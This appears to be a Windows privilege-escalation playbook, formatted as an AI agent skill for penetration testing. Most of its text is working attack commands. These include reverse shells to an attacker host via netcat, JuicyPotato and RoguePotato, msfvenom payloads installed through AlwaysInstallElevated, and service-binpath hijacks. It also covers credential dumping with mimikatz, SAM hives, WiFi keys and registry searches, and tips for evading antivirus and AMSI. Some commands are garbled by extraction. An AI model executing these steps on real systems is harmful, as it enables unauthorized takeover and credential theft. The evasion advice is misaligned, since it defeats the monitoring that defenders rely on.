Windows Privilege Escalation

Purpose

Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements. This skill covers system enumeration, credential harvesting, service exploitation, token impersonation, kernel exploits, and various misconfigurations that enable escalation from standard user to Administrator or SYSTEM privileges.

Inputs / Prerequisites

Initial Access

Shell or RDP access as standard user on Windows system

Enumeration Tools

WinPEAS, PowerUp, Seatbelt, or manual commands

Exploit Binaries

Pre-compiled exploits or ability to transfer tools

Knowledge

Understanding of Windows security model and privileges

Authorization

Written permission for penetration testing activities

Outputs / Deliverables

Privilege Escalation Path

Identified vector to higher privileges

Credential Dump

Harvested passwords, hashes, or tokens

Elevated Shell

Command execution as Administrator or SYSTEM

Vulnerability Report

Documentation of misconfigurations and exploits

Remediation Recommendations

Fixes for identified weaknesses Core Workflow 1. System Enumeration Basic System Information

OS version and patches

systeminfo | findstr / B / C: "OS Name" / C: "OS Version" wmic qfe

Architecture

wmic os get osarchitecture echo % PROCESSOR_ARCHITECTURE%

Environment variables

set Get-ChildItem Env: | ft Key , Value

List drives

wmic logicaldisk get caption , description , providername User Enumeration

Current user

whoami echo % USERNAME%

User privileges

whoami / priv whoami / groups whoami / all

All users

net user Get-LocalUser | ft Name , Enabled , LastLogon

User details

net user administrator net user % USERNAME%

Local groups

net localgroup net localgroup administrators Get-LocalGroupMember Administrators | ft Name , PrincipalSource Network Enumeration

Network interfaces

ipconfig / all Get-NetIPConfiguration | ft InterfaceAlias , InterfaceDescription , IPv4Address

Routing table

route print Get-NetRoute - AddressFamily IPv4 | ft DestinationPrefix , NextHop , RouteMetric

ARP table

arp

A

Active connections

netstat

ano

Network shares

net share

Domain Controllers

nltest / DCLIST:DomainName Antivirus Enumeration

Check AV products

WMIC / Node:localhost / Namespace:\root\SecurityCenter2 Path AntivirusProduct Get displayName 2. Credential Harvesting SAM and SYSTEM Files

SAM file locations

% SYSTEMROOT%\repair\SAM % SYSTEMROOT%\System32\config\RegBack\SAM % SYSTEMROOT%\System32\config\SAM

SYSTEM file locations

% SYSTEMROOT%\repair\system % SYSTEMROOT%\System32\config\SYSTEM % SYSTEMROOT%\System32\config\RegBack\system

Extract hashes (from Linux after obtaining files)

pwdump SYSTEM SAM > sam . txt samdump2 SYSTEM SAM - o sam . txt

Crack with John

john

format=NT sam . txt HiveNightmare (CVE-2021-36934)

Check vulnerability

icacls C:\Windows\System32\config\SAM

Vulnerable if: BUILTIN\Users:(I)(RX)

Exploit with mimikatz

mimikatz> token::whoami / full mimikatz> misc::shadowcopies mimikatz> lsadump::sam / system:\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM / sam:\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM Search for Passwords

Search file contents

findstr / SI / M "password" * . xml * . ini * . txt findstr / si password * . xml * . ini * . txt * . config

Search registry

reg query HKLM / f password / t REG_SZ / s reg query HKCU / f password / t REG_SZ / s

Windows Autologin credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

PuTTY sessions

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

VNC passwords

reg query "HKCU\Software\ORL\WinVNC3\Password" reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 / v password

Search for specific files

dir / S / B * pass . txt == * pass . xml == * cred == * vnc == * . config* where / R C:\ * . ini Unattend.xml Credentials

Common locations

C:\unattend . xml C:\Windows\Panther\Unattend . xml C:\Windows\Panther\Unattend\Unattend . xml C:\Windows\system32\sysprep . inf C:\Windows\system32\sysprep\sysprep . xml

Search for files

dir / s * sysprep . inf * sysprep . xml * unattend . xml 2>nul

Decode base64 password (Linux)

echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 - d WiFi Passwords

List profiles

netsh wlan show profile

Get cleartext password

netsh wlan show profile key=clear

Extract all WiFi passwords

for / f "tokens=4 delims=: " % a in ( 'netsh wlan show profiles ^| find "Profile "' ) do @ echo off > nul & ( netsh wlan show profiles name= % a key=clear | findstr "SSID Cipher Key" | find / v "Number" & echo . ) & @ echo on PowerShell History

View PowerShell history

type % userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history . txt cat ( Get-PSReadlineOption ) . HistorySavePath cat ( Get-PSReadlineOption ) . HistorySavePath | sls passw 3. Service Exploitation Incorrect Service Permissions

Find misconfigured services

accesschk . exe - uwcqv "Authenticated Users" * / accepteula accesschk . exe - uwcqv "Everyone" * / accepteula accesschk . exe - ucqv

Look for: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG

Exploit vulnerable service

sc config binpath= "C:\nc.exe -e cmd.exe 10.10.10.10 4444" sc stop sc start Unquoted Service Paths

Find unquoted paths

wmic service get name , displayname , pathname , startmode | findstr / i "Auto" | findstr / i / v "C:\Windows\" wmic service get name , displayname , startmode , pathname | findstr / i / v "C:\Windows\" | findstr / i / v "" "

Exploit: Place malicious exe in path

For path: C:\Program Files\Some App\service.exe

Try: C:\Program.exe or C:\Program Files\Some.exe

AlwaysInstallElevated

Check if enabled

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer / v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer / v AlwaysInstallElevated

Both must return 0x1 for vulnerability

Create malicious MSI

msfvenom

p windows/x64/shell_reverse_tcp LHOST=10 . 10 . 10 . 10 LPORT=4444 - f msi - o evil . msi

Install (runs as SYSTEM)

msiexec / quiet / qn / i C:\evil . msi 4. Token Impersonation Check Impersonation Privileges

Look for these privileges

whoami / priv

Exploitable privileges:

SeImpersonatePrivilege

SeAssignPrimaryTokenPrivilege

SeTcbPrivilege

SeBackupPrivilege

SeRestorePrivilege

SeCreateTokenPrivilege

SeLoadDriverPrivilege

SeTakeOwnershipPrivilege

SeDebugPrivilege

Potato Attacks

JuicyPotato (Windows Server 2019 and below)

JuicyPotato . exe - l 1337 - p c:\windows\system32\cmd . exe - a "/c c:\tools\nc.exe 10.10.10.10 4444 -e cmd.exe" - t *

PrintSpoofer (Windows 10 and Server 2019)

PrintSpoofer . exe - i - c cmd

RoguePotato

RoguePotato . exe - r 10 . 10 . 10 . 10 - e "C:\nc.exe 10.10.10.10 4444 -e cmd.exe" - l 9999

GodPotato

GodPotato . exe - cmd "cmd /c whoami" 5. Kernel Exploitation Find Kernel Vulnerabilities

Use Windows Exploit Suggester

systeminfo > systeminfo . txt python wes . py systeminfo . txt

Or use Watson (on target)

Watson . exe

Or use Sherlock PowerShell script

powershell . exe - ExecutionPolicy Bypass - File Sherlock . ps1 Common Kernel Exploits MS17-010 (EternalBlue) - Windows 7/2008/2003/XP MS16-032 - Secondary Logon Handle - 2008/7/8/10/2012 MS15-051 - Client Copy Image - 2003/2008/7 MS14-058 - TrackPopupMenu - 2003/2008/7/8.1 MS11-080 - afd.sys - XP/2003 MS10-015 - KiTrap0D - 2003/XP/2000 MS08-067 - NetAPI - 2000/XP/2003 CVE-2021-1732 - Win32k - Windows 10/Server 2019 CVE-2020-0796 - SMBGhost - Windows 10 CVE-2019-1388 - UAC Bypass - Windows 7/8/10/2008/2012/2016/2019 6. Additional Techniques DLL Hijacking

Find missing DLLs with Process Monitor

Filter: Result = NAME NOT FOUND, Path ends with .dll

Compile malicious DLL

For x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll

For x86: i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll

Runas with Saved Credentials

List saved credentials

cmdkey / list

Use saved credentials

runas / savecred / user:Administrator "cmd.exe /k whoami" runas / savecred / user:WORKGROUP\Administrator "\10.10.10.10\share\evil.exe" WSL Exploitation

Check for WSL

wsl whoami

Set root as default user

wsl

default-user root

Or: ubuntu.exe config --default-user root

Spawn shell as root

wsl whoami wsl python - c 'import os; os.system("/bin/bash")' Quick Reference Enumeration Tools Tool Command Purpose WinPEAS winPEAS.exe Comprehensive enumeration PowerUp Invoke-AllChecks Service/path vulnerabilities Seatbelt Seatbelt.exe -group=all Security audit checks Watson Watson.exe Missing patches JAWS .\jaws-enum.ps1 Legacy Windows enum PrivescCheck Invoke-PrivescCheck Privilege escalation checks Default Writable Folders C:\Windows\Temp C:\Windows\Tasks C:\Users\Public C:\Windows\tracing C:\Windows\System32\spool\drivers\color C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys Common Privilege Escalation Vectors Vector Check Command Unquoted paths wmic service get pathname | findstr /i /v """ Weak service perms accesschk.exe -uwcqv "Everyone" * AlwaysInstallElevated reg query HKCU...\Installer /v AlwaysInstallElevated Stored credentials cmdkey /list Token privileges whoami /priv Scheduled tasks schtasks /query /fo LIST /v Impersonation Privilege Exploits Privilege Tool Usage SeImpersonatePrivilege JuicyPotato CLSID abuse SeImpersonatePrivilege PrintSpoofer Spooler service SeImpersonatePrivilege RoguePotato OXID resolver SeBackupPrivilege robocopy /b Read protected files SeRestorePrivilege Enable-SeRestorePrivilege Write protected files SeTakeOwnershipPrivilege takeown.exe Take file ownership Constraints and Limitations Operational Boundaries Kernel exploits may cause system instability Some exploits require specific Windows versions AV/EDR may detect and block common tools Token impersonation requires service account context Some techniques require GUI access Detection Considerations Credential dumping triggers security alerts Service modification logged in Event Logs PowerShell execution may be monitored Known exploit signatures detected by AV Legal Requirements Only test systems with written authorization Document all escalation attempts Avoid disrupting production systems Report all findings through proper channels Examples Example 1: Service Binary Path Exploitation

Find vulnerable service

accesschk . exe - uwcqv "Authenticated Users" * / accepteula

Result: RW MyService SERVICE_ALL_ACCESS

Check current config

sc qc MyService

Stop service and change binary path

sc stop MyService sc config MyService binpath= "C:\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe" sc start MyService

Catch shell as SYSTEM

Example 2: AlwaysInstallElevated Exploitation

Verify vulnerability

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer / v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer / v AlwaysInstallElevated

Both return: 0x1

Generate payload (attacker machine)

msfvenom

p windows/x64/shell_reverse_tcp LHOST=10 . 10 . 10 . 10 LPORT=4444 - f msi - o shell . msi

Transfer and execute

msiexec / quiet / qn / i C:\Users\Public\shell . msi

Catch SYSTEM shell

Example 3: JuicyPotato Token Impersonation

Verify SeImpersonatePrivilege

whoami / priv

SeImpersonatePrivilege Enabled

Run JuicyPotato

JuicyPotato . exe - l 1337 - p c:\windows\system32\cmd . exe - a "/c c:\users\public\nc.exe 10.10.10.10 4444 -e cmd.exe" - t * - c { F87B28F1-DA9A-4F35-8EC0-800EFCF26B83 }

Catch SYSTEM shell

Example 4: Unquoted Service Path

Find unquoted path

wmic service get name , pathname | findstr / i / v "" "

Result: C:\Program Files\Vuln App\service.exe

Check write permissions

icacls " C:\Program Files\Vuln App "

Result: Users:(W)

Place malicious binary

copy C:\Users\Public\shell.exe " C:\Program Files\Vuln . exe "

Restart service

sc stop " Vuln App " sc start " Vuln App" Example 5: Credential Harvesting from Registry

Check for auto-logon credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

DefaultUserName: Administrator

DefaultPassword: P@ssw0rd123

Use credentials

runas / user:Administrator cmd . exe

Or for remote: psexec \target -u Administrator -p P@ssw0rd123 cmd

Troubleshooting Issue Cause Solution Exploit fails (AV detected) AV blocking known exploits Use obfuscated exploits; living-off-the-land (mshta, certutil); custom compiled binaries Service won't start Binary path syntax Ensure space after = in binpath: binpath= "C:\path\binary.exe" Token impersonation fails Wrong privilege/version Check whoami /priv ; verify Windows version compatibility Can't find kernel exploit System patched Run Windows Exploit Suggester: python wes.py systeminfo.txt PowerShell blocked Execution policy/AMSI Use powershell -ep bypass -c "cmd" or -enc When to Use This skill is applicable to execute the workflow or actions described in the overview.